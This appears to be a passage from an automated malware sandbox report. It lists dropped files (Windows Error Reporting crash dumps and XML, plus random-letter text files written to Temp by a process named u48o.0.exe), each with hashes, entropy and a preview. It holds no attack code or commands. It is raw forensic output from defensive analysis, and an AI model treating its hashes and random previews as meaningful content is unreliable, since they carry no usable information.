                                                                                                                                                                                                                                            Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.5.8.3.3.8.4.9.7.5.3.8.2.1.4.4.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.5.8.3.3.8.4.9.8.0.6.9.4.6.3.7.....R.e.p.o.r.t.S.t.a.t.u.s.=.6.5.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.9.2.a.3.7.e.2.2.-.e.8.4.2.-.4.6.c.4.-.b.0.6.a.-.4.1.1.8.6.f.4.d.0.f.a.6.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.5.9.1.a.7.0.c.4.-.1.3.b.8.-.4.f.2.2.-.b.e.0.3.-.6.5.a.5.0.1.8.9.0.2.e.a.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.u.4.8.o...0...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.f.4.8.-.0.0.0.1.-.0.0.1.4.-.5.d.a.0.-.4.e.e.4.5.1.9.5.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.6.d.1.e.2.8.0.e.6.6.b.f.b.4.7.9.f.5.4.2.a.6.f.c.4.4.6.4.0.5.a.0.0.0.0.0.0.a.1.6.!.0.0.0.0.b.e.3.9.d.0.7.7.0.4.e.f.b.3.5.b.d.1.5.0.3.b.3.9.1.4.c.6.d.d.6.c.9.e.6.3.1.2.e.8.!.u.4.8.o...0...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.4.
                                                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                            File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:modified
                                                                                                                                                                                                                                            Size (bytes):65536
                                                                                                                                                                                                                                            Entropy (8bit):1.0239986286003018
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:192:Va7d9nOCzIlOYu70Rlize5jjSJ0xkzuiF/Z24IO8R+t0:grIoPIRlizqjQzuiF/Y4IO8y
                                                                                                                                                                                                                                            MD5:5570B07A1A622F4BBAD3AF8993909777
                                                                                                                                                                                                                                            SHA1:E412B10DB8667020A55CF650DB04CED930D76CB0
                                                                                                                                                                                                                                            SHA-256:0A4BF36CF36A0C86F8E2CDBCAE59F0E40A44DAA3A4E2C2422C0491333DC32492
                                                                                                                                                                                                                                            SHA-512:6293338864591EB3B653E6045BC1535B6184C3A47265A9FA3E0C4A7C5C6E65DE4CB9FC779506DFAB4EC432321589B1728A51B621DD6CAE2F0AB24DB7DD5620F3
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                            Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.5.8.3.3.1.8.0.0.3.5.7.9.3.9.8.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.5.8.3.3.1.8.0.1.1.8.6.0.5.7.5.....R.e.p.o.r.t.S.t.a.t.u.s.=.6.5.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.7.b.6.8.5.4.2.c.-.f.a.4.4.-.4.d.d.0.-.b.a.4.0.-.3.0.b.e.5.6.9.c.4.f.5.9.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.1.5.b.c.3.0.e.7.-.2.8.0.b.-.4.c.4.5.-.a.a.6.9.-.1.a.6.e.3.0.a.a.c.6.d.7.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.z.L.w.T.7.v.C.o.j.z...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.5.7.8.-.0.0.0.1.-.0.0.1.4.-.c.8.e.8.-.0.5.e.2.5.1.9.5.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.f.8.4.3.b.d.e.0.6.e.7.e.a.7.a.0.2.e.6.2.c.0.2.5.f.8.a.2.c.6.f.6.0.0.0.0.0.a.1.6.!.0.0.0.0.b.3.6.d.6.4.d.5.c.4.6.9.8.2.f.8.5.c.8.9.0.d.1.2.9.c.4.3.9.a.6.7.8.2.9.9.d.1.1.e.!.z.L.w.T.7.v.C.o.j.z...e.x.e.....T.a.r.g.e.t.A.p.p.
                                                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                            File Type:Mini DuMP crash report, 14 streams, Tue Apr 23 09:34:57 2024, 0x1205a4 type
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):56790
                                                                                                                                                                                                                                            Entropy (8bit):2.653099825044508
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:384:6LQ/DVa8C5vEEusJCoh5ZE1GQWDDaPOd:W2VE5vEEFCk56A1Ow
                                                                                                                                                                                                                                            MD5:D36FAF507A1DCB1D9DAAEF55DA10465F
                                                                                                                                                                                                                                            SHA1:48FFFA1D4ECB4D1328A99821ACB155EC80486897
                                                                                                                                                                                                                                            SHA-256:F031D5043FE755BC1BA48F45698F5400F516A6621F1E7099BCE1EAE5C17C56AE
                                                                                                                                                                                                                                            SHA-512:A4B22D89B2DF3BB1F0322F801C692B65A1E486F614D3527E673E5587F3F1569082DAE40DB776C1F2AEAA0C57BC87FED24639B4FC2313B2B099314AA28F609C1D
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                            Preview:MDMP..a..... .........'f............4...........p...<.......t...22..........T.......8...........T...........XS..~............"...........$..............................................................................eJ......0%......GenuineIntel............T.......H....f'f.............................0..2...............W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .S.u.m.m.e.r. .T.i.m.e...........................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                            File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):6312
                                                                                                                                                                                                                                            Entropy (8bit):3.7180543108890003
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:192:R6l7wVeJ4I6iY3YiddXpDy89b3ysfcfdm:R6lXJP6t3YiJ3xfz
                                                                                                                                                                                                                                            MD5:5C4E3B4C31EFF22F8966BC8165CB543C
                                                                                                                                                                                                                                            SHA1:58BB449C43BE34D280B7E9076F9F8F853A34A8EA
                                                                                                                                                                                                                                            SHA-256:6AB516EC2671897B2428ED8C9500FFD62EDE07B2E9C2645299260394A288E13D
                                                                                                                                                                                                                                            SHA-512:0072BE1014A63E983828082E667ADF8375938FB39B60136F90C764837488C5557B5A442F966569B055725CD36C1B48780069B0EC379C368FBB1FAFB7AF831B6D
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                            Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.3.9.1.2.<./.P.i.
                                                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                            File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):4555
                                                                                                                                                                                                                                            Entropy (8bit):4.434529210286872
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:48:cvIwWl8zssJg77aI9EnWpW8VY93Ym8M4JcmTUFq+q8ZSTf58ILcQd:uIjfqI7yW7VRJ9H8ILfd
                                                                                                                                                                                                                                            MD5:7BF5A91905DF0BA6544F27DE72199710
                                                                                                                                                                                                                                            SHA1:F30E574CBBE43B6572B76290F235E992A86CA0C1
                                                                                                                                                                                                                                            SHA-256:8FF6AC7D4DF2291BF8B40375B24505B5016A638C084FD7E29697F796BAFDB9D0
                                                                                                                                                                                                                                            SHA-512:59319E3E51F9A44C6A946F705BE5909CB2493A53ED1217E6690E83C1641D7D942BB02D7DC4D91520AF013D49EFD2CFCB4621D40A74F33A3AC8E5B78DBB2403F6
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                            Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="292357" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                            File Type:Mini DuMP crash report, 15 streams, Tue Apr 23 07:43:20 2024, 0x1205a4 type
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):44551
                                                                                                                                                                                                                                            Entropy (8bit):2.8741116674336293
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:384:6W+UrKUX/G3O1PTyR266A9bWSg4tds049qPJdM61Y:H+UWUX/G3O1GR22YR04C8
                                                                                                                                                                                                                                            MD5:744C6308EF6952B17BE101845F7ABD02
                                                                                                                                                                                                                                            SHA1:9AA87C15A81E65DF714E9AF43AF47CD13346B194
                                                                                                                                                                                                                                            SHA-256:21A9FD217EB0179E3D628C997D00193A8C4CFC596F0A0E25DCF62B6D9D881C2D
                                                                                                                                                                                                                                            SHA-512:F9492F1717C40B448F3CED1A70CE51E76402474E9D90BBBE74AA383CD44D5C8382D704CF90B3D1DFE485B1B6E985A7E9E9340264900A87F4BE8C895DFF55F509
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                            Preview:MDMP..a..... ........f'f............4...............H............!......D...l6..........`.......8...........T...........p1...|...........#...........%..............................................................................eJ......h&......GenuineIntel............T.......x....f'f.............................0..2...............W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .S.u.m.m.e.r. .T.i.m.e...........................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                            File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):8338
                                                                                                                                                                                                                                            Entropy (8bit):3.69977612383945
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:192:R6l7wVeJeue6Hie6YNhSU9+mRgmf7D6vSpDm89bpKsfeEDm:R6lXJO6r6Y7SU95Rgmfyvgppfe9
                                                                                                                                                                                                                                            MD5:E166D5A19E753353A5ED9E57CA3D12F6
                                                                                                                                                                                                                                            SHA1:052DE7DE6BC7C12036D86CD9DF050AE632E357EE
                                                                                                                                                                                                                                            SHA-256:296B40369AC9FD21B0A96002F2435A88E0FE2520A470FA8D0DFA513C44B95C6E
                                                                                                                                                                                                                                            SHA-512:21D2BB25499440E060B95DF1CDEDFEC2CFAB1D1096930D18892F5C0B1DAE335FC15C1369936A40170FCD248982261E9C9B3AF5BC88B850046109BC561583F3C0
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                            Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.5.4.9.6.<./.P.i.
                                                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                            File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):4583
                                                                                                                                                                                                                                            Entropy (8bit):4.473150504746131
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:48:cvIwWl8zslJg77aI9EnWpW8VYPYm8M4JcZFf7m+q8SjtCG4cHdd:uIjf/I7yW7VzJq6Hb4idd
                                                                                                                                                                                                                                            MD5:ADFD29DB4262CFEB9F74D8987158026E
                                                                                                                                                                                                                                            SHA1:B9BE0C27235B2A13ED05B8DFB04C5777EF368D34
                                                                                                                                                                                                                                            SHA-256:A50AC9AD868B1BF7DFB6F5E9F03D897787E799343B42BF03A74A951D48F892BF
                                                                                                                                                                                                                                            SHA-512:C9E7F4BCC6CF953FA1AE8929F72AD8364BC6DDCF6CB89DCBA71BAB4FD48AE47B51AA71AB361D3682B98F67E92CE42B1F36C1F9F1B7B5ABFAEC82689B0A32D4B1
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                            Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="292246" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\u48o.0.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1026
                                                                                                                                                                                                                                            Entropy (8bit):4.696658693841717
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:3MdIzLOg7SRKnk/cq8LUPYkwD7V07An1JLnjzXUPxLPu2k:3MILOg7SRKnqc5LU5oJ07A1JLnjzEBa
                                                                                                                                                                                                                                            MD5:61FF9363393269AD641F7DD8C14B5456
                                                                                                                                                                                                                                            SHA1:27855AC1499F6627BEB4D32C7DC77938A30F6B93
                                                                                                                                                                                                                                            SHA-256:5C4C4BA12F53DFAFD9ABBB44B9B6D42659217438CFE3C6710A2EAC3F2BBFAB2C
                                                                                                                                                                                                                                            SHA-512:636A83074F9C57EB8A5E8B2C17BAF1A60991B708F66E2E9BDCE70BF794E0D739849D4F6869EE3B45E529F9475BD8564AE66323FF0BCD06F4FA6FA213B0797C55
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                            Preview:OOJWCGHFZEYSVZSAVMGYFBZRQQVSPNKBSTFPIOXXACNWRXKBHEDWMUIFWAWPQFWWAYZBICXUMMZCLEUMDPYVPQRXQHCCBBIMLEYUCJTVIVHFVVALUDEUETBIGNGUYMTGFEFTYJDSOYIAGMAQACYHUALMXJEFLZIDJYQFYVMBLVJNYNVGMNZJNSUVMBGBYVXPDEWEGTGCOCELIMUCEYVSVRJNWAVFEDEKEFNKTYJYNMAIYMYUVCPQJCFORLEBTNEKVJQRKILYXNBOBHMHUQTFGWEZPTHSMKTNLWSHZRUKDCAMLMWJCBANNXSWEWWXNSKAVUXCXGWNJJSPEPOEOBEKQUUWBMBZHFOPPRYHDWPNLHYGQQAZMBKWTAOWYOLVGFETIBSZPNVKJZCVZHBLSVXXEZZZLOCAQBFRQRVLVLPOOKQLFZGMLSNUTBQWYKFAXKVUVDUHDHXUHXXLOJYSHSJSCDCSKSTRRIPKJTBSLGIRCVKDCTBNPMZMOCYWVVNCFLJOJAJXVTJNCACZLKULPCEQNVJXNHDCWDSASISDDFXERTWELSGCJXIPLIRYDNQBUUOQBDXNWXADWLFOUDJHYDMOKSFNWWDJZFNTEXZUQRTGGDNGSTMLLNHJWRRQKMWNHWVIYWOUQTPCIYXQLYYJUIUPPKXQQSYLIAYGNMUUJTVHNEKUJEWBEGNESVSMTMPBREMJMHBDPPODBEINHWXDHWVYNWSVOLHAZPSGKPFGELKZREADIJXSJHADRPPBSICVJDYZYWRQHOCWRXHZMHTFJEUDQDLLIAMFGRBMNAFOWVKHIQEMMHBAEDJDWLLCHLNMHVWRQOKFAJIUONMFXMFHYYZUMJXSEDOCEDACVHVOCVDSGVNGXXLLQDXUWIIWAIHTXOXJTBSWVOKBYKVWKJUWYNFPWJPCDFHBRUIEEGNVETOEPLBLCMJLVKSRMJYTXYKQZFYSEOZJRYLRBKWLTVQNZOSNCFWFBSDCCDRGPMCIKAWU
                                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\u48o.0.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1026
                                                                                                                                                                                                                                            Entropy (8bit):4.690474000177721
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:2OgtZqoLtXCKESzKP+tziBUswJwLVk9zxY/tks7VMejXhggCon:cLtXZEmKPopswJEqxUkp82an
                                                                                                                                                                                                                                            MD5:A01E6B89B2F69F2DA25CB28751A6261C
                                                                                                                                                                                                                                            SHA1:48C11C0BECEB053F3DB16EC43135B20360E77E9B
                                                                                                                                                                                                                                            SHA-256:0D0EB85E2964B5DDA19C78D11B536C72544AE51B09DBEC26E70C69ADDC7E9AA5
                                                                                                                                                                                                                                            SHA-512:1E335E567B7F959E7524E532E257FBC0A21818BDCE0B909F83CBBCE8013FA61A8D665D7DED0982F87B29A5A786A0EE7129792A1B2D48DD205180569D9E919059
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                            Preview:QFAPOWPAFGZUMXROWPODMNAMXJGGULHBVFMBDFCUTBDPEHPYKVYAURAEPYZMHPBECXOGPOKPNMKAIBYHBFNFVWPHHZFRFVAYYHSJZJTHAYESIKJCXVOVANTTAMQKCXEHJRYFSWGEELTALODIPFLWFILANHAGQENMCPNFLPAJIPRNZRAIETALHZECBIKVUBLJMHNYJXPSAMZZCVZQOHLATXYVRZQROYHFKLVOJLGRAGXLMXJHKHSSCTHDFNSLOUEZPTFGVVVGCDIXIBWQFIIFACZAYUUQZJRKZXJQPLVPFTJAMSPRDIBBPPFLUCOUPPQDSFKQXMEIFUXXAGKAWLWJPNBHZSGIAFFXPBLRMFNGMVBEWTTPFJEHMXLOZWQHEHGWBXCAMZISSZMPHUOREQDUTUEPDVLBWTFCJIFAGQOEHFIMLTDTDLYPEQZDZBBZYMKXTUKVCEROFCABVNAQXVLLCCNLEOGKLFPVSGMNNQZHFNCWNPGBCLLMTYKZMJSUDIPHSUQJQTOTICLSMQNHYJAQTVXMEZAEGNBGADHUJNJLQZSSGWRLYBWJEOTERXWRTICIVUFNKHRUSWRGABWPZDFTGSDASOKXSFUGVBUISDQNJUAOCSOANZFXTFQGDKEKGZJRMJMGTAJCTJEOCZCUZMUYKAKZZQYDRJXWZWMOXQQLWJMWAENIFMHJXMELOZTVHRLQZNWCBXKEBNUBDDOFYHNWIPPRWGDZCQLMHAOLYZIDJJXAASOVDNHNMDDCIWFPIOLQHWQCPUVUZUDVOKBMFLALCZEQWJAKTVUUDROHEKJKHQBLQZNVWSNNZFKMZLQPFYUYHNCDTCBVUUNKNZIORBFTFVKLHZTQAPWVKTTZFCTHJBBWQMZTFKADJIZZANUOLLRBSVTUCNIJWDQPYHEPWEUTFVNOACOFURIPTLDGJUOYFJRHAUIQREUKUSADZYOEDEDZRKKPKLFLFQIMMIKLOCTSOFOEZYVAGMCITCUWAOUT
                                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\u48o.0.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1026
                                                                                                                                                                                                                                            Entropy (8bit):4.698999446679606
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:W9l1TKf/7G6pHxojyPqnhSz0hujim56BAhI8QR9QlFpd:6l1uFqyP5zY5moAoah
                                                                                                                                                                                                                                            MD5:73351F70BFEF33BEEA9E1CC192801D02
                                                                                                                                                                                                                                            SHA1:ACFD9C2DFA1B38FAB53EEB4730B0DF0551B45D8C
                                                                                                                                                                                                                                            SHA-256:F6917A805A90AC72064D294E5E0FBA4604588F7B0EB2B3A3511D1FC6887E3E24
                                                                                                                                                                                                                                            SHA-512:56D46FF29F86F3B314EBC6CC456A1D153D0F1245A926F82AE7FA9A6A5AD792094FEDBB5FC489929186C8A72732BE4EAFF3BCF2E508B8B2FC50B013E6166B212C
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                            Preview:UNKRLCVOHVAXPHOHAZYDIMBTYYPLYBYVUEQLGGJJCFCITCEMGOMMPTCXLGLYUZHZWMTUNUOFUUYAUDMSGBWJKAMIFUAYTDIKVYQPGYQSIZTANWSUNZDHBRNONSOUWVUJZFBPOZIMZOUPVAYJKSJULUHYRYUUOLYWEWFCYAZHMJKHXUZLTHEXFDNRXIUQOZHGGMDFHSXAJKHPBRPJJKVVXGMDIMEMMFXEOBQJSMYSSMPVSVUNJLJSSMEFHHLFEVPWZDDEIKQGOJPOJWTWMNPIEQXWXOBLNLDRNRUGDUXCMTURFAWMSSYAENGRWRBIJOYJNUMDYXNDETRQMYAMGJYZKZQPFPCONTLPPRLYMQJPIWCAXNOLGZOTNQEWQGBVSNORDVIXIUJAENWBXHSXSDNAMBAXUDBRCRHHYFJQLZEAGFZJUFMBIUBABNXVYITYPKRJUMGDPPABWBKNLHDKPLRUIRQXXKLFZAHHOQZHNTUNORTHIPKRZRDGRVPKIZRHYAGOVNDISDQRFXONCHILLZJTGXRZPEIPHKZXDBODDSUZIKNUVTNMZGVZQILJHRYJYZKDBLCLJFWSXRREYFFMEXBICHNCCTBTTTTZZVMSHPBKJMXPXFJNIDQFSJDMCXXUZPFVBFVKYCVFVQFUVOJWWIUNBICQVZGOZZVDJKKZTGDLWXADCBHYGUDWYWTYVYOOICLDGZXJHSTPFGQBMRCCCBJSXCPVVBKRNYTLTAOWPNJFKXUXQORRVHCHMSRAHQHFDEMZUFOFJOQFXHQBLWKNHXKEBLUJMQCFCSTBVXKUUPPXZNEWBUZPPVJFCDLXJEGEZSQSHHBNUCTRMEDMGPNZBHGEXVTWWZFELEFQQWXGHSVDMBAGZANSOHWAGHWRFCVNRSBOOZFJQONOYPNXBMHJINMGSGLMUSTAOMZXKOIHFYYSJWELBRBKMJUVQKVVFUFLDZKJVPCATVIHCISAYNPTMBEUQYJRYFUSBKOSITLVDUTJ
                                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\u48o.0.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1026
                                                                                                                                                                                                                                            Entropy (8bit):4.698999446679606
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:W9l1TKf/7G6pHxojyPqnhSz0hujim56BAhI8QR9QlFpd:6l1uFqyP5zY5moAoah
                                                                                                                                                                                                                                            MD5:73351F70BFEF33BEEA9E1CC192801D02
                                                                                                                                                                                                                                            SHA1:ACFD9C2DFA1B38FAB53EEB4730B0DF0551B45D8C
                                                                                                                                                                                                                                            SHA-256:F6917A805A90AC72064D294E5E0FBA4604588F7B0EB2B3A3511D1FC6887E3E24
                                                                                                                                                                                                                                            SHA-512:56D46FF29F86F3B314EBC6CC456A1D153D0F1245A926F82AE7FA9A6A5AD792094FEDBB5FC489929186C8A72732BE4EAFF3BCF2E508B8B2FC50B013E6166B212C
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Reputation:unknown
